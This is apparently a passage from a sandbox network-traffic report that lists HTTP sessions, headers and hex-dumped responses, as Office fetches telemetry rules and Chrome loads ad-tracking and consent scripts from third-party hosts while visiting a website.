                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          53192.168.2.74977913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 9a785c76-f01e-0071-7218-1c431c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cf8rgvlb86c9c009800000004a0000000004n7q
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          54192.168.2.749782104.26.12.604432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC647OUTGET /widget/?d=1040172889715587758A2B28B3F6BBD2&nid=300&p=2114454483&t=240&s=1280x1024x24&u=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.dtscdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: uid=1040172889715587758A2B28B3F6BBD2; Domain=dtscdn.com; Expires=Fri, 11-Apr-2025 08:59:06 GMT; Max-Age=15465600; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          X-T: 0.91
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          x-server: web16.ny1.dtscdn.com
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2hODBYpuTEAw4ZFOSW8DZ4jkflneK%2Bk7DSBoj6MamO99Pt5GaTRj9yo3POOIcL%2F2gCSkVPGGWXKv8Y6wNvJd0A71L0Lt8nz3oXgrETU%2BK3nTndplkXUrIZK6ttOsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672e3bac642b3-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          55192.168.2.749781148.113.153.944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC631OUTGET /?partner=137085098&mapped=1040172889715587758A2B28B3F6BBD2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel.onaudience.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC438INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: cookie=10907476198d4755; Max-Age=31536000; Expires=Tue, 14 Oct 2025 09:12:37 GMT; Path=/; Domain=.onaudience.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: done_redirects147=1; Max-Age=86400; Expires=Tue, 15 Oct 2024 09:12:37 GMT; Path=/; Domain=.onaudience.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          location: https://match.adsrvr.org/track/cmf/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                          content-length: 0
                                                                                                                                                                                                                                                                                                                                                                          connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          56192.168.2.74978065.9.66.1224432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC530OUTGET /lt/c/3825/lt.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: tags.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC564INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 63965
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 01:41:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 20 Aug 2024 17:49:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "2afd7a7856345176e1c9c378191ae043"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 4f114016fe4d6c05531b0486ec2868be.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: H0TmxWGxtun8DjIe0wdPEV28HM17IV9y1tPokCaqBPKuiH80Cy1zVg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 27097
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC15820INData Raw: 76 61 72 20 6c 6f 74 61 6d 65 49 73 43 6f 6d 70 61 74 69 62 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 72 65 74 75 72 6e 20 28 20 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 28 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 29 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 20 21 3d 3d 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== '
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC16384INData Raw: 65 3d 3d 3d 74 68 69 73 2e 52 62 29 62 3d 6c 74 33 38 32 35 5f 6c 61 28 62 29 3b 65 6c 73 65 7b 76 61 72 20 65 3d 5b 5d 2c 68 3d 5b 5d 3b 69 66 28 64 26 26 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 22 43 6c 69 65 6e 74 20 22 2b 74 68 69 73 2e 61 2e 62 63 70 43 6c 69 65 6e 74 2b 22 20 63 61 6e 6e 6f 74 20 72 75 6e 20 6c 74 2e 6d 69 6e 2e 6a 73 20 62 65 63 61 75 73 65 20 69 74 20 68 61 73 20 6e 6f 20 64 6f 6d 61 69 6e 73 20 77 68 69 74 65 6c 69 73 74 65 64 2e 22 3b 76 61 72 20 67 3d 62 3b 64 6f 7b 69 66 28 65 2e 69 6e 63 6c 75 64 65 73 28 67 29 7c 7c 68 2e 69 6e 63 6c 75 64 65 73 28 67 29 29 7b 63 3d 67 3b 62 72 65 61 6b 7d 76 61 72 20 66 3d 67 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3b 67 3d 67 2e 73 75 62 73 74 72 69 6e 67 28 66 2b 31 29 7d 77
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e===this.Rb)b=lt3825_la(b);else{var e=[],h=[];if(d&&0===e.length)throw"Client "+this.a.bcpClient+" cannot run lt.min.js because it has no domains whitelisted.";var g=b;do{if(e.includes(g)||h.includes(g)){c=g;break}var f=g.indexOf(".");g=g.substring(f+1)}w
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC16384INData Raw: 75 74 20 74 68 65 20 69 6e 64 69 63 61 74 65 64 20 64 61 74 61 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 20 66 6f 72 20 74 68 69 73 20 66 65 61 74 75 72 65 2e 22 3b 20 62 72 65 61 6b 3b 63 61 73 65 20 31 31 36 3a 62 3d 22 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 6e 74 61 69 6e 65 64 20 61 20 44 65 63 6c 61 72 65 64 20 49 44 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 22 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 62 3d 22 55 6e 68 61 6e 64 6c 65 64 20 65 72 72 6f 72 20 63 6f 64 65 20 22 2b 61 2b 22 20 77 61 73 20 72 65 63 65 69 76 65 64 20 66 72 6f 6d 20 74 68 65 20 64 61 74 61 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 63 61 6c 6c 2e 22 7d 62 26 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ut the indicated data collection client is not enabled for this feature."; break;case 116:b="The request contained a Declared ID that was not properly formatted.";break;default:b="Unhandled error code "+a+" was received from the data collection call."}b&&
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC15377INData Raw: 72 6f 72 2c 20 72 75 6c 65 20 63 6f 6e 74 61 69 6e 73 20 62 61 64 20 73 65 6c 65 63 74 6f 72 3a 20 22 2b 64 29 7d 72 65 74 75 72 6e 20 63 7d 20 66 75 6e 63 74 69 6f 6e 20 6c 74 33 38 32 35 5f 4b 62 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 2c 64 3d 28 6c 74 33 38 32 35 5f 34 28 62 29 3f 6e 75 6c 6c 3a 62 2e 62 62 29 7c 7c 22 76 61 6c 75 65 22 3b 61 3d 6c 74 33 38 32 35 5f 4c 62 28 61 2c 62 2e 4c 62 29 3b 76 61 72 20 65 3d 5b 5d 3b 61 26 26 30 3c 61 2e 6c 65 6e 67 74 68 26 26 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 61 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 66 6f 72 28 76 61 72 20 67 3d 64 2e 73 70 6c 69 74 28 22 2e 22 29 2c 66 3d 30 3b 68 26 26 66 3c 67 2e 6c 65 6e 67 74 68 3b 29 68 3d 68 5b 67 5b 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ror, rule contains bad selector: "+d)}return c} function lt3825_Kb(a,b){var c=null,d=(lt3825_4(b)?null:b.bb)||"value";a=lt3825_Lb(a,b.Lb);var e=[];a&&0<a.length&&(Array.prototype.forEach.call(a,function(h){for(var g=d.split("."),f=0;h&&f<g.length;)h=h[g[f


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          57192.168.2.749783142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC671OUTGET /i/ca-pub-2542884292174911?href=https%3A%2F%2Fald.my.id&ers=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-s70W1fa31jz39L64y_u2Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjqtDikmJw0JBiOO90h-k6EEt8fcmkAcRO6TNYg4C49eY51qlAnPTvPGsRELtrXWT1B2JDhUusjiBcdInVE4hVey6xmgLx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1iYgvt10hfUxEAtxc7Qd3LyDTWDC4iYhJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDAwNLPQOj-AIDAMsvSTo"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 36 66 30 64 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 6f0dif (typeof __googlefc === 'undefined' || typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{_._F_tog
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: rn fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{n
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1953INData Raw: 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 6c 61 28 68 2c 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: :switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?this.la(h,g):this.A(g)};e.prototype
